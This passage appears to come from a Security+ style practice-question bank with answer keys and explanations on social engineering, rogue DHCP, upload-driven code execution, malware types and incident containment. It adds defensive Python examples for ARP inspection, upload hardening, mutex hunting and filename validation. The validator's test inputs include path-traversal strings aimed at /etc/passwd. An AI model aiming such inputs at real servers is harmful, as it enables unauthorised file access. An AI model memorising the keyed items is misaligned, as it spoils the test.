D. Smishing, because the attacker is using a mobile device
Answer: A
Pretexting is the best fit because the attacker invents a convincing scenario, uses insider details, and pressures the technician to bypass normal verification. The goal is not just to trick someone into clicking a link, but to create a false identity and narrative that makes the request seem legitimate. This is a common tactic in help desk fraud and account takeover attempts.
Why this answer
The caller is using pretexting because they have fabricated a scenario (the CFO traveling and needing an urgent wire transfer) and assumed a false identity to manipulate the help desk technician into resetting MFA. Pretexting relies on a crafted story or pretext to gain trust and bypass security controls, which is exactly what the caller is doing here.
Exam trap
The trap here is that candidates often confuse the delivery method (voice call = vishing) with the underlying social engineering technique (pretexting), but the question specifically asks for the primary technique being used, not the channel.
How to eliminate wrong answers
Option B is wrong because baiting involves offering something enticing (e.g., a free USB drive or download) to trick the victim, not creating a false identity or story. Option C is wrong because vishing is a social engineering technique that uses voice calls, but the question asks for the primary technique being used, not the delivery method; the core technique here is pretexting, not vishing. Option D is wrong because smishing specifically refers to SMS-based phishing attacks, and while the caller may be using a mobile device, the attack is carried out via a phone call, not text messages.
A branch office reports intermittent failures reaching internal sites. DHCP logs show clients receiving leases from an unknown MAC address, and DNS responses for intranet.example resolve to an address owned by the same device. Which two attacks best match the evidence? Select two.
Select 2 answers
A. A rogue DHCP server is issuing unauthorized lease information.
B. DNS spoofing or poisoning is directing users to the wrong host.
D. A port scan is enumerating exposed services on the branch subnet.
E. Password spraying is attempting many logins with common passwords.
Answers: A, B
Clients are receiving leases from an unknown MAC address, which strongly suggests an unauthorized DHCP server on the network. A rogue server can hand out incorrect gateway, DNS, or lease settings and quickly disrupt connectivity. That makes it a direct match for the observed lease behavior.
Why this answer
A rogue DHCP server on the network can issue unauthorized lease information, causing clients to receive IP configurations from an unknown MAC address. This matches the DHCP log evidence and can lead to intermittent connectivity issues as clients receive conflicting or incorrect network settings.
Exam trap
The trap here is that candidates may confuse DHCP starvation (which exhausts the legitimate pool) with a rogue DHCP server, but the evidence of unknown MAC addresses in leases directly points to an unauthorized server, not resource exhaustion.
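The two ARP-poisoning questions above (DHCP snooping plus Dynamic ARP Inspection) and this rogue DHCP question all rest on the same mechanism: a binding table learned only from DHCP server messages on trusted ports. The following simplified model is an added illustration, not switch firmware or any vendor's implementation; every port name, MAC and IP address is constructed. It shows why DAI without snooping has nothing to compare against, and why the same trusted-port rule also drops a rogue DHCP server on an access port.

```python
"""Simplified model of DHCP snooping, Dynamic ARP Inspection (DAI) and rogue
DHCP filtering on a managed switch. Added illustration, not switch firmware or
any vendor's implementation; every port, MAC and IP address below is constructed."""
from dataclasses import dataclass, field


@dataclass
class Switch:
    trusted_ports: set = field(default_factory=set)   # uplinks to the real DHCP server/gateway
    dhcp_snooping: bool = False
    dai: bool = False
    bindings: dict = field(default_factory=dict)      # ip -> mac learned from DHCP ACKs
    log: list = field(default_factory=list)

    def on_dhcp_ack(self, port, server_mac, client_mac, client_ip):
        """A DHCP server message (OFFER/ACK) arrives on `port` from `server_mac`."""
        if not self.dhcp_snooping:
            return "forwarded"                  # nothing inspected, nothing learned
        if port not in self.trusted_ports:
            # Server-side DHCP traffic on an access port means a rogue DHCP server.
            self.log.append(f"DROP rogue DHCP server {server_mac} on {port}")
            return "dropped"
        # Real switches also record VLAN, port and lease time; mac is enough here.
        self.bindings[client_ip] = client_mac
        return "forwarded"

    def on_arp_reply(self, port, sender_mac, sender_ip):
        """Validate an ARP reply that claims `sender_ip` is at `sender_mac`."""
        if not self.dai or port in self.trusted_ports:
            return "forwarded"
        known_mac = self.bindings.get(sender_ip)
        if known_mac is None:
            # No trusted binding. With snooping off the table is empty, so DAI
            # cannot tell a forged reply from a legitimate one and drops both;
            # this is why snooping must be enabled first.
            self.log.append(f"DROP ARP {sender_ip} is-at {sender_mac} on {port}: no binding")
            return "dropped"
        if known_mac != sender_mac:
            self.log.append(f"DROP spoofed ARP {sender_ip} is-at {sender_mac} on {port}")
            return "dropped"
        return "forwarded"


def simulate(dhcp_snooping, dai):
    """Replay a constructed sequence: legitimate lease via the uplink, rogue DHCP
    server on an access port, the real gateway's ARP, an attacker's unsolicited
    ARP claiming the gateway address, and the victim's own legitimate ARP."""
    sw = Switch(trusted_ports={"Gi0/24"}, dhcp_snooping=dhcp_snooping, dai=dai)
    sw.on_dhcp_ack("Gi0/24", "aa:aa:aa:aa:aa:01", "00:11:22:33:44:55", "10.0.0.10")
    return {
        "rogue_dhcp": sw.on_dhcp_ack("Gi0/7", "de:ad:be:ef:00:01", "00:11:22:33:44:66", "10.0.0.20"),
        "gateway_arp": sw.on_arp_reply("Gi0/24", "aa:aa:aa:aa:aa:fe", "10.0.0.1"),
        "poison_arp": sw.on_arp_reply("Gi0/7", "de:ad:be:ef:00:01", "10.0.0.1"),
        "victim_arp": sw.on_arp_reply("Gi0/3", "00:11:22:33:44:55", "10.0.0.10"),
    }


if __name__ == "__main__":
    for cfg in [(False, False), (False, True), (True, True)]:
        print(f"snooping={cfg[0]} dai={cfg[1]} -> {simulate(*cfg)}")
```

With both controls off everything is forwarded; with DAI on but snooping off the forged gateway reply is dropped, but so is the victim's legitimate reply, because the table is empty; with both on, the rogue DHCP server is dropped, the forged gateway reply is dropped and the legitimate hosts keep working. On Cisco IOS switches the corresponding commands are `ip dhcp snooping`, `ip dhcp snooping vlan <id>`, `ip arp inspection vlan <id>`, and `ip dhcp snooping trust` on the uplink interface.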
A scan of a web server hosting an internal help-desk portal reports these findings: `/var/www/uploads` is world-writable by the application account, PHP files in that directory are executed by Apache, and the app allows users to upload images without content-type validation. Which issue should be remediated first to most reduce the chance of remote code execution?
A. Outdated browser plug-in on an admin workstation, because it may expose users to drive-by attacks.
B. Default SNMP community string on a printer in a separate VLAN, because it weakens network monitoring.
C. World-writable executable upload path, because an attacker could upload or modify server-executable code in a web-accessible directory.
D. Missing disk encryption on a help-desk laptop, because stolen devices are a common breach source.
Answer: C
The world-writable, web-executable upload path is the most urgent issue because it creates a direct path to remote code execution. If an attacker can place or alter files in a directory that Apache executes, they may be able to run arbitrary server-side code. The lack of content-type validation increases the chance that a malicious payload will be accepted as a harmless file upload.
Why this answer
Option C is correct because the combination of a world-writable upload directory, PHP execution in that directory, and no content-type validation allows an attacker to upload a malicious PHP file (e.g., a web shell) and execute it via the web server, achieving remote code execution. This directly exploits the server's trust in user-supplied files and the execution context of Apache, making it the most immediate and severe risk.
Exam trap
The trap here is that candidates may focus on the 'world-writable' aspect alone, but the critical chain is the combination of writable upload path, PHP execution, and lack of content-type validation, which together enable direct remote code execution; other options are valid security concerns but do not address the immediate RCE risk.
How to eliminate wrong answers
Option A is wrong because an outdated browser plug-in on an admin workstation is a client-side vulnerability that requires user interaction (e.g., visiting a malicious site) and does not directly enable remote code execution on the web server itself. Option B is wrong because a default SNMP community string on a printer in a separate VLAN primarily exposes network configuration data and could allow information disclosure or denial of service, but it does not provide a path to execute arbitrary code on the help-desk portal server. Option D is wrong because missing disk encryption on a help-desk laptop addresses data-at-rest protection against physical theft, which is a different threat vector (confidentiality breach) and does not mitigate remote code execution on the live web server.
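The remediation for this finding is a chain of controls, just as the exposure is a chain of weaknesses. The following is an added example, not the portal's own code: it shows the weak upload pattern the scan describes beside a hardened one (content sniffed by magic bytes, server-chosen random name, non-executable file mode, created with `O_EXCL`) and a check for the world-writable directory. Directory paths and sample files are constructed.

```python
"""Image upload handling: the weak pattern the scan describes next to a
hardened one. Added example, not the portal's code; directory paths and the
sample files are constructed."""
import os
import secrets
import stat
import tempfile

# Signatures of the only formats the portal is supposed to accept.
IMAGE_MAGIC = {b"\x89PNG\r\n\x1a\n": ".png", b"\xff\xd8\xff": ".jpg",
               b"GIF87a": ".gif", b"GIF89a": ".gif"}


def is_world_writable(path):
    """True when any local user can create or replace files in `path`."""
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


def sniff_image_extension(data):
    """Extension implied by the file's leading bytes, or None if not an image."""
    for magic, ext in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return ext
    return None


def weak_save(upload_dir, client_filename, data):
    """The pattern in the finding: client-chosen name, no content check, saved
    into a web-served, PHP-executing directory. Shown only for contrast."""
    path = os.path.join(upload_dir, os.path.basename(client_filename))
    with open(path, "wb") as f:
        f.write(data)
    return path


def safe_save(store_dir, data):
    """Hardened version: content sniffed, server-chosen random name, created
    exclusively with a non-executable mode. store_dir is assumed to sit outside
    the web root or to be served with script execution disabled."""
    ext = sniff_image_extension(data)
    if ext is None:
        raise ValueError("rejected: not a recognised image format")
    name = secrets.token_hex(16) + ext             # client filename is ignored entirely
    path = os.path.join(store_dir, name)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    return path


def demo():
    """Run the constructed cases and report what each control caught."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        uploads = os.path.join(tmp, "uploads")
        os.mkdir(uploads)
        os.chmod(uploads, 0o777)                   # mimic the world-writable finding
        results["world_writable_detected"] = is_world_writable(uploads)
        os.chmod(uploads, 0o750)                   # remediated permissions
        results["fixed_perms_ok"] = not is_world_writable(uploads)

        png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16   # constructed minimal PNG header
        script = b"<?php echo 'hello'; ?>"          # constructed non-image payload
        results["weak_accepts_script"] = weak_save(uploads, "avatar.php", script).endswith(".php")
        results["safe_png"] = safe_save(uploads, png).endswith(".png")
        try:
            safe_save(uploads, script)
            results["safe_rejects_script"] = False
        except ValueError:
            results["safe_rejects_script"] = True
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Magic-byte sniffing is a filter, not a guarantee: a file that starts with a valid image header and carries script text further in still passes it. The decisive control is therefore the one the question's answer points at, namely that nothing in the upload path is ever executed by the server, either by storing files outside the web root or by disabling PHP for that directory (with mod_php, `php_admin_flag engine off` inside the matching `<Directory>` block).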
Based on the exhibit, what type of malware is most likely present?
A. Logic bomb
B. Worm
C. Spyware
D. Rootkit
Answer: A
The malicious action is set to occur only when a specific condition is met, in this case a date trigger and a username check. That makes it a logic bomb. Logic bombs stay hidden until a trigger event occurs, then they execute destructive or unauthorized actions such as deleting files.
Why this answer
The exhibit shows a script that checks for a specific employee name and, if the condition is met, deletes critical system files. This is a classic logic bomb: malicious code embedded in a legitimate program that executes when predefined conditions (e.g., a specific user, date, or event) are satisfied. Logic bombs do not self-replicate or continuously spy; they lie dormant until triggered.
Exam trap
The trap here is that candidates confuse a logic bomb with a worm because both can cause damage, but they fail to recognize that a logic bomb requires a specific trigger condition and does not self-replicate, unlike a worm which spreads automatically.
How to eliminate wrong answers
Option B (Worm) is wrong because a worm self-replicates and spreads across networks without user interaction, whereas this script requires manual execution and does not propagate. Option C (Spyware) is wrong because spyware covertly collects user data (e.g., keystrokes, browsing habits) and sends it to an attacker, but this script destroys files without exfiltrating information. Option D (Rootkit) is wrong because a rootkit hides its presence and provides persistent privileged access by modifying OS kernel or system calls, whereas this script is a simple conditional deletion routine with no stealth or persistence mechanisms.
Based on the exhibit, which indicator should the security team prioritize for endpoint detection and hunting?
The attacker rotates infrastructure frequently, but one artifact has remained consistent across recent investigations.
A. The current source IP addresses hosting the payloads
B. The unique mutex name created by the malware on infected endpoints
C. The exact wording of the latest phishing email lure
D. The filename of the attachment used in the most recent incident
Answer: B
The mutex is a host-based artifact that the malware consistently creates, making it a stronger and more durable detection point than rotating domains or repacked hashes.
Why this answer
Option B is correct because a mutex (mutual exclusion object) is a unique artifact created by malware to prevent multiple instances of itself from running on the same endpoint. Since the attacker rotates infrastructure frequently (IPs, domains, filenames), the consistent mutex name provides a stable indicator of compromise (IoC) that can be used for endpoint detection and hunting across different incidents. This makes it a reliable signature for identifying the same malware family or variant even when other indicators change.
Exam trap
The trap here is that candidates focus on easily changed artifacts (IPs, filenames, email content) rather than recognizing that mutexes are often hardcoded in malware binaries and persist across infrastructure changes, making them a more stable indicator for detection.
How to eliminate wrong answers
Option A is wrong because source IP addresses hosting payloads are frequently rotated by attackers (e.g., using fast-flux DNS or cloud instances), making them unreliable for persistent detection. Option C is wrong because the exact wording of phishing email lures can be easily altered by attackers in subsequent campaigns, and email content is often filtered or modified by security gateways, reducing its forensic value. Option D is wrong because filenames of attachments are trivial to change (e.g., using random or polymorphic naming), and attackers often use different filenames in each wave to evade signature-based detection.
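A hunt for a hardcoded mutex name, as an added example (not code from the page). One detail the explanation leaves out: Windows mutex names are handed to CreateMutexW as wide strings, so in a PE or a memory dump the name is usually stored as UTF-16LE, and a search for the plain ASCII string misses it. The mutex name and the sample blobs below are constructed for illustration.

```python
"""Hunt for a hardcoded mutex name across binaries, scripts and memory dumps.

Added example, not part of the original page. The mutex name and the sample
"files" are constructed; a real hunt substitutes the value from the IR report.
"""
import re

# Hypothetical mutex name (assumption, stands in for the one from the investigation)
MUTEX_NAME = "Global\\Zx9-Updater-Lock"


def find_mutex(blob: bytes, name: str = MUTEX_NAME) -> list[tuple[str, int]]:
    """Return (encoding, offset) for every occurrence of the name.

    Compiled binaries usually carry the name as UTF-16LE (the CreateMutexW
    argument); scripts and some packers carry it as ASCII, so both are tried.
    """
    hits = []
    for label, needle in (("ascii", name.encode("ascii")),
                          ("utf-16-le", name.encode("utf-16-le"))):
        for m in re.finditer(re.escape(needle), blob):
            hits.append((label, m.start()))
    return hits


# Constructed samples: same family repacked per wave, different URLs, same mutex.
SAMPLES = {
    "wave1.exe": b"\x4d\x5a\x90\x00" + b"http://203.0.113.10/p.php\x00"
                 + MUTEX_NAME.encode("utf-16-le") + b"\x00\x00",
    "wave2.exe": b"\x4d\x5a\x90\x00" + b"http://198.51.100.7/x/\x00"
                 + MUTEX_NAME.encode("utf-16-le") + b"\x00\x00",
    "clean.exe": b"\x4d\x5a\x90\x00" + b"legit software\x00",
    "script.ps1": b"$m = New-Object System.Threading.Mutex($false, '"
                  + MUTEX_NAME.encode("ascii") + b"')",
}


def hunt(samples: dict[str, bytes]) -> dict[str, list[tuple[str, int]]]:
    """Map each sample name to its mutex hits, omitting samples with none."""
    return {n: find_mutex(b) for n, b in samples.items() if find_mutex(b)}


if __name__ == "__main__":
    for name, hits in hunt(SAMPLES).items():
        print(name, hits)
```

Both "waves" match on the UTF-16LE copy of the name even though their hosting URLs differ, which is exactly why the mutex outlives the rotated infrastructure; the clean sample produces no hit.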
A SOC analyst reviews an alert on a workstation where PowerShell launched from a scheduled task, downloaded an encoded command from a remote server, and then spawned rundll32.exe. Traditional antivirus did not flag any files on disk, and the activity stops after rebooting the host. Which type of malware behavior best fits this event?
A.Worm behavior that is spreading through SMB shares
B.Fileless attack using trusted system tools to run malicious code in memory
C.Rootkit that is hiding itself by modifying kernel drivers
D.Trojan that can only run after a user manually opens a malicious attachment
AnswerB
This matches a fileless attack because the malicious activity relies on built-in tools like PowerShell and rundll32 rather than an obvious executable on disk. The alert shows code being fetched and executed from memory, which often evades traditional file-based antivirus detection. The fact that the behavior disappears after reboot further supports a memory-resident, fileless technique.
Why this answer
The attack uses PowerShell to download and execute an encoded command directly in memory, then spawns rundll32.exe—both are trusted Microsoft binaries. No files are written to disk, and the activity ceases after reboot, which are hallmarks of a fileless malware attack that operates entirely in volatile memory.
Exam trap
The trap here is that candidates may associate any scheduled task or PowerShell activity with a worm or Trojan, but the key differentiator is the absence of disk writes and the use of memory-only execution, which is the defining characteristic of a fileless attack.
How to eliminate wrong answers
Option A is wrong because worm behavior spreading through SMB shares typically involves file-based replication and network scanning (e.g., WannaCry spreading via the EternalBlue exploit), not a scheduled task launching PowerShell to download an encoded command and spawn rundll32.exe. Option C is wrong because a rootkit that modifies kernel drivers would persist across reboots and often evade detection by hiding processes or files, but here the activity stops after reboot and no kernel-level modification is indicated. Option D is wrong because a Trojan requiring manual user attachment opening does not match the automated scheduled task trigger and the use of encoded remote commands; the attack is initiated by a scheduled task, not user interaction.
A user receives a phone call from someone who claims to be a member of the company's IT support team. The caller states that the user's account has been compromised and requests the user's username, password, and the current multi-factor authentication (MFA) code to 'verify identity and secure the account.' Which type of social engineering attack is being attempted?
A.Spear phishing
B.Vishing
C.Pretexting
D.Tailgating
AnswerB
Vishing (voice phishing) is a social engineering attack conducted over the phone. The attacker impersonates a trusted entity to trick the victim into revealing sensitive information such as passwords and MFA codes.
Why this answer
B is correct because vishing (voice phishing) is a social engineering attack conducted over the phone, where the attacker impersonates a trusted entity (IT support) to trick the victim into revealing sensitive information such as credentials and MFA codes. The request for the current MFA code is a key indicator, as it would allow the attacker to bypass multi-factor authentication in real time.
Exam trap
The trap here is confusing vishing with pretexting, as both involve deception, but vishing specifically uses voice (phone) as the attack vector, while pretexting is a broader category that can occur through any communication channel.
How to eliminate wrong answers
Option A is wrong because spear phishing is a targeted email-based attack that uses deceptive messages to trick the recipient into clicking a malicious link or opening an attachment, not a phone call. Option C is wrong because pretexting involves creating a fabricated scenario (pretext) to obtain information, but it is not limited to phone calls and often occurs in person or via email; the question specifically describes a phone call, which is the hallmark of vishing. Option D is wrong because tailgating is a physical security attack where an unauthorized person follows an authorized individual into a restricted area without proper authentication, not a phone-based social engineering attempt.
A support portal lets users upload files and name them manually. During review, a tester submits a filename containing path traversal sequences, and logs later show the application trying to access files outside the intended upload folder. Which two changes best address the flaw? Select two.
Select 2 answers
A.Validate and canonicalize the filename on the server, then allow only approved name patterns.
B.Store uploads outside the web root and deny execution permissions on the upload directory.
C.Increase the maximum upload size so the application can handle more files.
D.Add browser-side JavaScript validation to reject suspicious filenames.
E.Hide detailed error messages from end users only.
AnswersA, B
Server-side canonicalization and allowlisting stop attackers from escaping the expected directory structure. Client-side checks are not enough because attackers can modify requests directly. This is the most direct way to prevent traversal sequences from being interpreted as filesystem paths.
Why this answer
Option A is correct because server-side validation and canonicalization (e.g., using `realpath()` or `Path.GetFullPath()`) resolves path traversal sequences like `../` to an absolute path, which can then be checked against an allowlist of permitted patterns. This prevents the application from following malicious sequences to access files outside the intended upload directory. Without canonicalization, simple string filtering can be bypassed by encoding or alternative traversal patterns. Option B is correct because storing uploads outside the web root means a file that lands in the directory cannot be requested directly as a web resource, and denying execute permission on the directory means a script that does get written there cannot run; together these limit the damage if validation is ever bypassed.
Exam trap
CompTIA often tests the misconception that client-side validation or error message hiding is sufficient to prevent server-side attacks, when in fact only server-side canonicalization and allowlisting can stop path traversal.
How to eliminate wrong answers
Option C is wrong because the maximum upload size has nothing to do with where a file is written; raising it only increases resource consumption. Option D is wrong because browser-side JavaScript runs on a client the attacker controls and is bypassed by sending the request directly, so it is at best a usability aid. Option E is wrong because hiding error messages reduces information leakage but leaves the traversal flaw intact; the application would still follow the malicious path.
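A server-side filename check of the kind Option A describes, as an added example (not the page's code). The upload root is a hypothetical directory outside the web root, and the name pattern is an assumed allowlist; the point is the order of operations: decode, reject separators, allowlist the basename, then canonicalize and confirm the result is still under the root.

```python
"""Server-side filename validation for an upload handler (added example).

UPLOAD_ROOT and ALLOWED_NAME are assumptions for illustration; the check
works for any root directory and any allowlist pattern.
"""
import os
import re
import unicodedata
from urllib.parse import unquote

# Assumed upload directory, deliberately outside the web root (Option B)
UPLOAD_ROOT = os.path.realpath("/srv/app/uploads")
# Assumed allowlist: must start with a letter or digit, so "." and ".." fail
ALLOWED_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,99}")


class InvalidFilename(ValueError):
    pass


def safe_upload_path(user_name: str, root: str = UPLOAD_ROOT) -> str:
    """Return an absolute path under root, or raise InvalidFilename."""
    # 1. undo URL encoding twice so %2e%2e%2f and %252e%252e%252f are seen as ../
    name = unquote(unquote(user_name))
    name = unicodedata.normalize("NFKC", name)
    # 2. refuse any directory component, NUL, or Windows separator
    if "/" in name or "\\" in name or "\x00" in name:
        raise InvalidFilename("path separators or NUL not allowed")
    # 3. allowlist what remains (rejects '.', '..', hidden files, odd characters)
    if not ALLOWED_NAME.fullmatch(name):
        raise InvalidFilename(f"name does not match allowlist: {name!r}")
    # 4. canonicalize and verify the resolved path is still inside root
    full = os.path.realpath(os.path.join(root, name))
    if os.path.commonpath([root, full]) != root:
        raise InvalidFilename("resolved path escapes upload root")
    return full


def is_valid_filename(user_name: str) -> bool:
    """Convenience wrapper for tests and request handlers."""
    try:
        safe_upload_path(user_name)
        return True
    except InvalidFilename:
        return False


if __name__ == "__main__":
    for candidate in ["report.pdf", "../../etc/passwd", "..%2f..%2fetc%2fpasswd", ".htaccess"]:
        print(f"{candidate!r:32} -> {is_valid_filename(candidate)}")
```

Step 4 is the defence in depth: even if a future change weakens the allowlist, the commonpath check still refuses anything that resolves outside the upload root.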
An organization wants to reduce the risk of malware infections from removable media. Which three of the following controls should be implemented? (Choose three.)
Select 3 answers
A.Disabling AutoRun and AutoPlay features
B.Enforcing a policy of full disk encryption on all removable drives
C.Using group policy to block execution from removable media
D.Scanning all removable media with antivirus software upon insertion
E.Requiring all removable media to be formatted as NTFS
AnswersA, C, D
Why this answer
Disabling AutoRun and AutoPlay features prevents malicious code from executing automatically when removable media is inserted, which is a common infection vector. Using group policy to block execution from removable media stops any executable files from running, even if manually launched. Scanning all removable media with antivirus software upon insertion detects and quarantines known malware before it can interact with the system.
Exam trap
The trap here is that candidates often confuse data protection controls (like encryption) with execution prevention controls, or they assume that file system formatting (NTFS) provides security against malware execution.
Several employees receive a text message that says their payroll deposit failed and they must tap a link to verify account details. The link opens a fake login page. What type of attack is this?
A.Phishing
B.Smishing
C.Pretexting
D.Baiting
AnswerB
Smishing is phishing delivered through SMS or other text messaging services.
Why this answer
Smishing is a form of phishing that uses SMS (Short Message Service) text messages as the attack vector. In this scenario, the attacker sends a fraudulent text message claiming a payroll deposit failure and includes a link to a fake login page, which is the classic mechanism of smishing. The attack relies on social engineering via SMS to trick the recipient into revealing sensitive credentials.
Exam trap
The trap here is that candidates often confuse 'smishing' with general 'phishing' because they do not differentiate the delivery vector (SMS vs. email), but the SY0-701 exam expects you to identify the specific attack type based on the communication channel used.
How to eliminate wrong answers
Option A is wrong because phishing is a broad category of social engineering attacks typically carried out via email, not specifically via SMS text messages; while smishing is a subset of phishing, the question explicitly describes an SMS-based attack, making 'smishing' the more precise term. Option C is wrong because pretexting involves fabricating a scenario (pretext) to obtain information, often through impersonation or a false backstory, but it does not necessarily involve a direct link to a fake login page or the use of SMS as the delivery mechanism. Option D is wrong because baiting relies on offering something enticing (e.g., a free download or USB drive) to lure the victim into a trap, whereas this attack uses a false sense of urgency (payroll failure) and a link to a fake login page, which is characteristic of smishing, not baiting.
A finance manager gets a phone call from someone claiming to be the CEO's assistant, urgently requesting a wire transfer before a board meeting. What type of attack is this?
A.Smishing
B.Vishing
C.Spear phishing
D.Watering-hole attack
AnswerB
This is a phone-based social engineering attempt that uses urgency and impersonation.
Why this answer
B is correct because vishing (voice phishing) uses a phone call to socially engineer the victim into performing a sensitive action, such as a wire transfer. The attacker impersonates a trusted authority (the CEO's assistant) and exploits urgency to bypass normal verification procedures. This is distinct from text-based phishing (smishing) or targeted email attacks (spear phishing).
Exam trap
The trap here is that candidates confuse the delivery method (phone call) with the attack type, often choosing 'spear phishing' because the target is a specific individual, but the defining characteristic is the voice channel, not the targeting precision.
How to eliminate wrong answers
Option A is wrong because smishing relies on SMS/text messages, not voice calls, to deliver the phishing lure. Option C is wrong because spear phishing is a targeted email attack that uses personalized content, not a real-time phone conversation. Option D is wrong because a watering-hole attack compromises a legitimate website frequented by the target group to deliver malware, not a direct social engineering call.
A vulnerability scan produces these results:
- Finding 1: High severity, internet-facing VPN appliance, known exploit available, no compensating controls
- Finding 2: Critical severity, internal development workstation, requires authenticated local access
- Finding 3: Medium severity, test server, no public exploit and not reachable from outside
Which finding should be remediated first?
A.Finding 1
B.Finding 2
C.Finding 3
D.All findings are equal because the severity rating alone determines priority
AnswerA
An internet-facing VPN with known exploit code and no compensating controls presents the highest practical risk because it is exposed and readily exploitable.
Why this answer
Finding 1 should be remediated first because it combines high severity with an internet-facing attack surface and a known exploit, meaning an attacker can remotely compromise the VPN appliance without authentication or compensating controls. This creates an immediate and direct risk of network breach, unlike the other findings which require local access or are isolated from external threats.
Exam trap
The trap here is that candidates prioritize by severity alone (Critical > High) without considering the attack vector, exploitability, and network exposure, which are key to risk-based prioritization in the SY0-701 exam.
How to eliminate wrong answers
Option B is wrong because although the severity is critical, the vulnerability requires authenticated local access, meaning an attacker must already have a foothold inside the network, making it less urgent than an internet-facing exploit. Option C is wrong because medium severity on a test server with no public exploit and no external reachability poses minimal immediate risk, as exploitation requires both access and a custom attack. Option D is wrong because severity rating alone does not determine priority; factors like exposure, exploit availability, and compensating controls must be considered in risk-based remediation.
A threat report says an attacker changes domains daily and rehosts infrastructure in cloud VPS environments, but the phishing email wording, login-page flow, and PowerShell download behavior remain the same. What type of information is most useful for a durable detection rule?
A.Only the current malware hash from the latest sample
B.The attacker’s behavioral pattern and technique sequence
C.The names of the victim company’s departments
D.A screenshot of the phishing email subject line only
AnswerB
Technique-based indicators are more durable because the attacker can rotate infrastructure without changing core behavior.
Why this answer
Option B is correct because the attacker's behavioral pattern and technique sequence remain consistent even as infrastructure changes. A durable detection rule should focus on the invariant TTPs (Tactics, Techniques, and Procedures) such as the phishing lure structure, the login-page flow, and the PowerShell download behavior, which persist across domain and IP changes. This aligns with the MITRE ATT&CK framework's emphasis on detecting adversary behaviors rather than ephemeral artifacts like hashes or IP addresses.
Exam trap
CompTIA often tests the misconception that static IOCs like hashes or subject lines are reliable for detection, when in fact behavioral patterns and technique sequences provide durable detection against rapidly changing infrastructure.
How to eliminate wrong answers
Option A is wrong because malware hashes change with each new sample, making them ephemeral IOCs that cannot provide durable detection when the attacker rehosts infrastructure daily. Option C is wrong because victim company department names are irrelevant to the attacker's technical behavior and do not help detect the phishing or download sequence. Option D is wrong because a screenshot of the phishing email subject line is a static, easily changed artifact that does not capture the invariant login-page flow or PowerShell download behavior.
A workstation opens an attachment labeled as an invoice and then begins creating scheduled tasks, disabling security services, and contacting a known malicious IP address. What is the best first containment action?
A.Run a full antivirus scan while leaving the system connected
B.Isolate the workstation from the network using the EDR containment feature
C.Reboot the workstation to clear any active malicious processes
D.Uninstall the email client that delivered the attachment
AnswerB
EDR-based isolation stops command-and-control traffic and limits further spread while preserving the system for investigation.
Why this answer
Option B is correct because the workstation is actively communicating with a known malicious IP address and disabling security services, indicating an active compromise. Isolating the workstation via EDR containment immediately stops the outbound command-and-control traffic and prevents lateral movement, which is the priority first step in incident response before any remediation or analysis.
Exam trap
The trap here is that candidates often choose to run an antivirus scan or reboot first, thinking they can clean the infection, but the exam emphasizes that containment (stopping the spread and C2) is the immediate priority over remediation or removal.
How to eliminate wrong answers
Option A is wrong because running a full antivirus scan while the system is still connected to the network does not stop ongoing malicious activity, such as C2 communication or scheduled task creation, and may allow the malware to spread. Option C is wrong because rebooting the workstation may clear active processes but does not remove persistence mechanisms like scheduled tasks, and the malware could re-establish contact with the C2 server upon reboot, while also losing volatile forensic data. Option D is wrong because uninstalling the email client does not address the active compromise already in progress; the malware is already executing and communicating, so removing the delivery vector is irrelevant to immediate containment.
A user's laptop suddenly shows encrypted .docx files, a ransom note, and the EDR console reports mass file renames and shadow copy deletion. The device is still online and connected to the corporate VPN. What is the best immediate action?
A.Reboot the laptop into safe mode and attempt manual malware removal.
B.Quarantine the endpoint from the network through EDR or physical isolation.
C.Restore the affected files from backup before taking any other action.
D.Tell the user to change their password and continue working from the same laptop.
AnswerB
Isolating the system immediately contains the ransomware, limits lateral spread, and preserves the device for later investigation. Because the host is still connected to the VPN, it could continue encrypting mapped drives or reach other systems. Containment comes before eradication or recovery, especially when destructive behavior is still active.
Why this answer
Option B is correct because the immediate priority in a confirmed ransomware incident is to contain the threat by isolating the compromised host from the network. The EDR console showing mass file renames and shadow copy deletion indicates active encryption and lateral movement risk. Quarantining via EDR or physically disconnecting the network cable stops the ransomware from encrypting additional shares or communicating with its C2 server, preserving evidence and preventing further damage.
Exam trap
The trap here is that candidates may choose to restore from backups (Option C) first, not realizing that the infected host must be isolated before any recovery attempt to prevent immediate re-encryption of restored files.
How to eliminate wrong answers
Option A is wrong because rebooting into safe mode and attempting manual malware removal is a forensic step that should only occur after containment; it risks the ransomware continuing to encrypt files during the reboot process and does not stop network propagation. Option C is wrong because restoring files from backup before isolating the endpoint could allow the ransomware to re-encrypt the restored files if the host is still online, and it may also overwrite critical forensic evidence. Option D is wrong because telling the user to change their password and continue working ignores the active encryption and allows the ransomware to spread to network shares and other systems via the VPN connection, violating incident response containment principles.
A caller says they are from the help desk and need the employee's MFA code to "complete a password reset". Which social engineering technique is being used?
A.Phishing
B.Pretexting
C.DDoS
D.SQL injection
AnswerB
The caller is inventing a believable story and role to trick the employee into revealing a secret code.
Why this answer
Pretexting is a social engineering technique where an attacker fabricates a scenario (the pretext) to trick a victim into divulging sensitive information. In this case, the attacker pretends to be from the help desk and invokes a false password reset procedure to obtain the employee's MFA code, which should never be shared. The MFA code is a time-based one-time password (TOTP) or push notification response that authenticates the user, not a tool for password resets.
Exam trap
The trap here is that candidates may confuse pretexting with phishing because both involve deception, but pretexting relies on a fabricated identity and scenario (often via phone or in-person) rather than a malicious electronic message.
How to eliminate wrong answers
Option A is wrong because phishing typically involves sending fraudulent emails or messages that contain malicious links or attachments to steal credentials or install malware, not a direct phone call requesting an MFA code under a false pretext. Option C is wrong because a DDoS (Distributed Denial of Service) attack is a network-level attack that overwhelms a target server with traffic to disrupt services, and it has no relation to social engineering or obtaining an MFA code via impersonation. Option D is wrong because SQL injection is a web application attack in which crafted input alters a database query; it targets the application's data layer, not the person, and has nothing to do with a phone call asking for an MFA code.
Users on the internal Wi-Fi report that the finance portal suddenly resolves to a different IP address, and the browser shows a fake login page that closely matches the real site. The DNS resolver cache on the network also contains unexpected entries for that host name. What attack is most likely?
